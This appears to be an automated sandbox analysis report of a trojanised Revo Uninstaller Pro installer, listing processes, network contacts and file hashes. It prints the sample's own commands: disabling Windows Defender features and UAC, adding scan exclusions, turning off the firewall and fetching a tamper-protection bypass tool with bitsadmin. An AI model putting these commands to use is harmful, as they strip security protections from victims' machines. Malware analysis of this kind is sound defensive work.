PID 4616 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 1520 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 2012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp C:\Windows\system32\rundll32.exe
PID 3340 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp C:\Windows\system32\rundll32.exe
PID 708 wrote to memory of 968 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\runonce.exe
PID 708 wrote to memory of 968 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\runonce.exe
PID 968 wrote to memory of 3264 N/A C:\Windows\system32\runonce.exe C:\Windows\System32\grpconv.exe
PID 968 wrote to memory of 3264 N/A C:\Windows\system32\runonce.exe C:\Windows\System32\grpconv.exe
PID 4616 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4616 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3340 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp C:\Windows\system32\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp

"C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp" /SL5="$C0060,18996440,788992,C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs"

C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat" "

C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$3024A,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\system32\rundll32.exe

"rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\system32\regsvr32.exe

"regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"

C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe

C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "netsh advfirewall set allprofiles state off"

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\main.bat" "

C:\Windows\SysWOW64\mode.com

mode 65,10

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat" "

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e file.zip -p___________5028pwd2533pwd24016___________ -oextracted

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Windows\SysWOW64\timeout.exe

timeout /T 180 /NOBREAK

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"111.exe"

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"C:\ProgramData\uzlyLtM20yixSdV\111.exe"

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"C:\ProgramData\uzlyLtM20yixSdV\111.exe"

C:\ProgramData\uzlyLtM20yixSdV\111.exe

"C:\ProgramData\uzlyLtM20yixSdV\111.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 telete.in udp
US 199.59.243.227:443 telete.in tcp
US 8.8.8.8:53 227.243.59.199.in-addr.arpa udp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp
US 199.59.243.227:443 telete.in tcp

Files

C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp

MD5 d0e24e6d7017127bea02bb0160229bee
SHA1 34350e5b7f268797b2a7ec56390c2228f841b37b
SHA256 ca0a5b43e255d0fa7205be3437ea706eda966dd1839ae01d1de1d3b62f832994
SHA512 f5c2edc35c2e43e199c2d4d1d904d9b06cc238b99a6f691f5a9c820c8ed0db77346158ae41237f0086a5009012202bdab4b533b42223f72837c461a499be5c86

C:\Users\Admin\AppData\Local\Temp\is-F7UCB.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs

MD5 c84933bcccf41369ef9ecce015b86ed0
SHA1 624713276ae217d8d05c03598eecd31209c7f77a
SHA256 ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679
SHA512 221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363

C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat

MD5 b0a7842dd51df8942bc8b837282d1c2b
SHA1 0e9432597657c28ca9ac766ac7bf0a903d6aeb3b
SHA256 4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8
SHA512 b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6

C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

MD5 dc21d689cfa1860e8820ed0ee45b1f2a
SHA1 acf2db6df76114601a2e58097629e0c8cbce129b
SHA256 01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c
SHA512 a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140

C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp

MD5 74f1186a6d3bc01716681712c6b24a74
SHA1 9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18
SHA256 d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d
SHA512 bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0

C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\iswin7logo.dll

MD5 1ea948aad25ddd347d9b80bef6df9779
SHA1 0be971e67a6c3b1297e572d97c14f74b05dafed3
SHA256 30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488
SHA512 f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\b2p.dll

MD5 ab35386487b343e3e82dbd2671ff9dab
SHA1 03591d07aea3309b631a7d3a6e20a92653e199b8
SHA256 c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2
SHA512 b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

C:\Users\Admin\AppData\Local\Temp\is-H594I.tmp\botva2.dll

MD5 67965a5957a61867d661f05ae1f4773e
SHA1 f14c0a4f154dc685bb7c65b2d804a02a0fb2360d
SHA256 450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105
SHA512 c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pyjodul3.kdv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/4312-131-0x0000000005FB0000-0x0000000006304000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6bff6adce2a7cc1a2f331061641c82f3
SHA1 80cc8d381b16b0ea86894252fffefcc206b403ce
SHA256 a02ca11204d69c3430a630540209bd89886b8106614bfaac0eb0e1dc8e6a7f9f
SHA512 e3652c9cb68566c281d62e78a6494a215349c41a58d01ac0c4f1e909af3ce07f1c57bc2834e3d2ad584a1fbecdbdeb81fab4d7ff80c91b98920d219ca87e77ef

memory/4312-133-0x0000000006970000-0x00000000069BC000-memory.dmp

memory/4312-134-0x000000006F700000-0x000000006F74C000-memory.dmp

memory/4312-144-0x00000000077B0000-0x0000000007853000-memory.dmp

memory/4312-145-0x0000000007A60000-0x0000000007A71000-memory.dmp

memory/3948-146-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4692-150-0x0000000005830000-0x0000000005B84000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 73909591451d3d1f7c6e353a52ce7afa
SHA1 f7f0badcda6bbe4666233728e4fc57e2061ff911
SHA256 938ed00289d478f6234221da4c836e4ed5b281d75f28aa27e737ca92d98e0a24
SHA512 3b292f129ffac3333897ddbc488b5ce84a31095b1c6ae9736ef21bfd359ea51c5da99ccd7af62395133a5abfb273ed43cfb92c48857b6865b24a1f27ef52ceec

memory/3340-159-0x0000000000400000-0x0000000000509000-memory.dmp

memory/3340-162-0x0000000007390000-0x000000000739F000-memory.dmp

memory/3340-160-0x00000000748B0000-0x00000000748CB000-memory.dmp

memory/3340-161-0x0000000075660000-0x0000000075671000-memory.dmp

memory/4692-163-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 759d93b25e23ab1faa35f2e13b3adb9e
SHA1 325cee68c2765b166c648374b6ad6e07080ec03c
SHA256 46da386d4198c126a60b8c3b293c674ce8b844c7b0893a6956638947a9797e32
SHA512 89090bc8dff1a9ddfae2cf37eab5d72ba6f88c2ea5241932cba550c6d024604726d49eceda2aa833f84d2220866102224e8f0af241f47a04604a936faa5f2899

memory/636-184-0x0000000006BC0000-0x0000000006BE2000-memory.dmp

memory/636-185-0x0000000007F50000-0x00000000084F4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 16e084bc764dbfb34c262d32abb743e6
SHA1 1ce50039217fca8441984a5f79ebf4db9da5354d
SHA256 a3c01d310fd888da1f2ceccfe4bbedd2d139bd66da10cb68914f0fc4153ad599
SHA512 ff67806345700e42bb205cd471011cd7b88f2aff01bba27eea6c4062c6cde059f3a6b8d8d9c94ccc51bc5cd91d4aea24d7d832f5d186d37c869f215483987b02

memory/1200-197-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6190fc29490068464249b428f75047d6
SHA1 e5f555b2985167e13f61907cf9a00a78a0c7dd76
SHA256 3cde051d26ea7c7073a3e73c0e903cd5aa60b8e502573e8e0c7391effb6588bc
SHA512 81d0999325fdd3ee61044abf7698a45ba6d6fb00e9474fdd30c08d3414063d62bbdb3c620e722db7e613200378380c49218a8d52b040386372aaab4f311e0ab4

memory/3856-218-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 46057eda4d28b17e51e7e708dd570c9a
SHA1 6a5d6a620dd326ccc6c6f4759118de9b4b90ce74
SHA256 0c94c7500f261fe14483f1c927f08e26980c1e5dd0bf83e866cdda1c8a7adcf3
SHA512 99f4ce7532a5ac71e47de3e43457db1a23227153eea7188d0ec7c4f853b8132ee5ba5828d4fffed040709722f532f19992f4fdbb8261df58c6e9f85fc89beb27

memory/964-239-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e76c39db445edb5e1a4d1ec43e5567d0
SHA1 be398199fa043840a69b17fe545b9b4ca8dc35ab
SHA256 5ea7746b6096f671aae5f55739cacfb28fee391cc4ef2d8774b2e1d3398c06c6
SHA512 fe3a17fcdfe275d3cbd44d3afea97034c17f3fd88d7c2247b4369fe9b24372e9f1dbc732f4cb6b0196eef5aca0f55b8b5076f0f0d81f1c976981ff2ab5feccf8

memory/1136-260-0x000000006F6E0000-0x000000006F72C000-memory.dmp

memory/3340-262-0x0000000000400000-0x0000000000509000-memory.dmp

memory/2932-285-0x0000000005E60000-0x00000000061B4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1c7a7ac4d02de7177598e568cd1cf811
SHA1 a72c865aca9bb5034cb5b9f56101cb330653c61d
SHA256 d3bf5a804a6d2d95837e77f97201cbaec19bb44672d1da9e6e20f29cb2b30d7e
SHA512 4f50baff10680af724e45f69e448cec786dbea3d9c4c2f0f99bf6250f967de6bbd181a775e4280261505b7b0a03f97498065533314d23fbdd59064b8037225df

memory/2932-287-0x000000006F700000-0x000000006F74C000-memory.dmp

memory/2932-388-0x0000000007AA0000-0x0000000007AB4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 69e8bd332cc3ba76ca61bed2edc9759b
SHA1 a1c669b40ec3b1d77c1d8c553a052180d56cbc0b
SHA256 e9bf7274c49093fe06b4e6d46157f147810ab5906672c0c7bed5d3034fdc2e3a
SHA512 17d29612420080a16c6e4d59e8220eec106e308dfa4262c8835ba3cd9f47cd2c1a2538292568767a33a8917ea84029ca9c87a6167b858c19bc10b3a0b05bff72

memory/1520-408-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b05f5ec99e746efdb7dd9751579575d4
SHA1 07a3d6e33e7eb86404ed4b87ee7ad09899689e14
SHA256 a74004fe2aa75c4eee13fae7f6fc18ae9904239b214a3eac6779b6d6513d2488
SHA512 fd370f79dedcbd5f321bd87d273d2b098f94b243bff75adee6805495f16222ca54c4ba2bc39abb1618d1a2c87b162340b395dfc3b4dd39eeadd4425d407635c0

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

MD5 ddb041550a3e69764cd9d7d3de3636f3
SHA1 1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c
SHA256 54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975
SHA512 00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

MD5 edc78deb34de240c787b1011161e9a4e
SHA1 2d31275530dce33d3bc329991c8ad59e1b303577
SHA256 69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b
SHA512 e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b

memory/2012-456-0x000000006F6E0000-0x000000006F72C000-memory.dmp

memory/2012-466-0x00000000079D0000-0x0000000007A73000-memory.dmp

C:\Windows\System32\drivers\revoflt.sys

MD5 498c3d4d44382a96812a0e0ff28d575b
SHA1 c34586b789ca5fe4336ab23ad6ff6eeb991c9612
SHA256 23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba
SHA512 ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1

memory/2012-471-0x0000000007E60000-0x0000000007E71000-memory.dmp

memory/2012-472-0x0000000007EA0000-0x0000000007EB4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c5a13c0d8b66ec62c774da9617d8b1fb
SHA1 17b1c8c5e9b29afe680c0675aac15712111ccc7a
SHA256 00ae712813cbadc4486db634b5524db7d5f5ff9680f5b0f588c2c90d03fd3316
SHA512 b0306fb83c35661fa9996674b9657d4b5fb593313ca4d299f92bb71e5b4e3770d79e7a3f166cbbd86b0b948d19a1d41117da5ce982f6dafdbd1731f09948833a

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll

MD5 75d7bf3468669a6c3df6f4d048315128
SHA1 678d3b531738573520367b47c0cd52cf5e431fa0
SHA256 927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae
SHA512 9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

MD5 1dd8459f2595e4c0603ad491590f6952
SHA1 607efe3c74388fb1e4b19f8f7ed2520ebfc349a1
SHA256 5bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d
SHA512 c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d

memory/4072-490-0x000000006F6E0000-0x000000006F72C000-memory.dmp

memory/4072-500-0x00000000070E0000-0x0000000007183000-memory.dmp

memory/2596-501-0x0000000000400000-0x0000000000E32000-memory.dmp

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.ini

MD5 6c9dbe894ea20eb190db6b483f17030d
SHA1 1bac02001cba8c083b987264f1bb89b05b74155f
SHA256 24ffc231de9a4573b4ae743555c43dcc550ff8455ea681c788e50bda03a3a846
SHA512 b0941e0026ba9117d3cf846e89723dede9f9a00dde688dbf90715244cfdc38b75b579e1c02c788626b16cb6875934341fd2acb685c145389ccd629df9355f62a

memory/4072-506-0x0000000007420000-0x0000000007431000-memory.dmp

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini

MD5 c37fb8c46d0281dd27768fd1101614f0
SHA1 03e736a49687f9ac10b35cc791e7df5b7e55f4d8
SHA256 ee2e68e61821054a1946efd0260f7e70c3f338765d04edca7625d05677fd980c
SHA512 b074f71e06c38f484573edde490f85792ada589e953e96d64188461f41e8ca4d0a90a6fc081ec36e4dc0067337abeea567c40b4e4fd89522497b1ba735262776

memory/3340-511-0x00000000748B0000-0x00000000748CB000-memory.dmp

memory/3340-510-0x0000000000400000-0x0000000000509000-memory.dmp

memory/4072-516-0x0000000007460000-0x0000000007474000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f4dd70c385c79cc5ebda9fe89100f210
SHA1 39b66e96adf422d6ce14416b291a8104a779261c
SHA256 1753d46a9bc3658056b8aa36a8a26cf7101dca212507a4f07cacca013afc9759
SHA512 64050203a854fe2fd366e1a81ecbe18e7da1eba98b44412fa4f369a51faa648f466ae510d872877d428d585e47082baf479d235b8d0d595e67176a2bdf69ab40

memory/2880-528-0x000000006F6E0000-0x000000006F72C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4121c28f824fbc2d46c627f886c635da
SHA1 5137783aa9254147be2500b3f325e48fe700399d
SHA256 3e642f6f08a38ca17830880b2e11441b5dfa0ca1933ffcad96a1011f2c2c3777
SHA512 12351b348a1e4d86da96036a280c62917e6297e88faddb145b8176f0afd31b36667675db2c928729977c50645107d0ec6406ac3b09689a85c8ae6b1e6db4b288

memory/3340-562-0x0000000000400000-0x0000000000509000-memory.dmp

memory/3948-563-0x0000000000400000-0x0000000000429000-memory.dmp

memory/3464-565-0x000000006F6E0000-0x000000006F72C000-memory.dmp

memory/3464-575-0x0000000007050000-0x00000000070F3000-memory.dmp

memory/3464-576-0x0000000007300000-0x0000000007311000-memory.dmp

C:\ProgramData\VS Revo Group\Revo Uninstaller Pro\revouninstallerpro4.lic

MD5 8462a9b69c76a9603a4143d51fbc201e
SHA1 4473590f93f94f22c340a354516191c3c0ba6532
SHA256 fe4bcb4251f77375119a936c80fb36221af0c5105e840e2e115d47f96cb437c8
SHA512 2f02ecdb06760a093f4d8e6f04c97138695b064db8cb2dcc4af9b47c829852f38b77be9425eb2f3e3e36f85da181c116c829921fa35ae68afc57c728d5393570

memory/3464-578-0x0000000007350000-0x0000000007364000-memory.dmp

memory/1184-580-0x0000000000400000-0x0000000000E32000-memory.dmp

memory/3996-581-0x0000000005970000-0x0000000005CC4000-memory.dmp

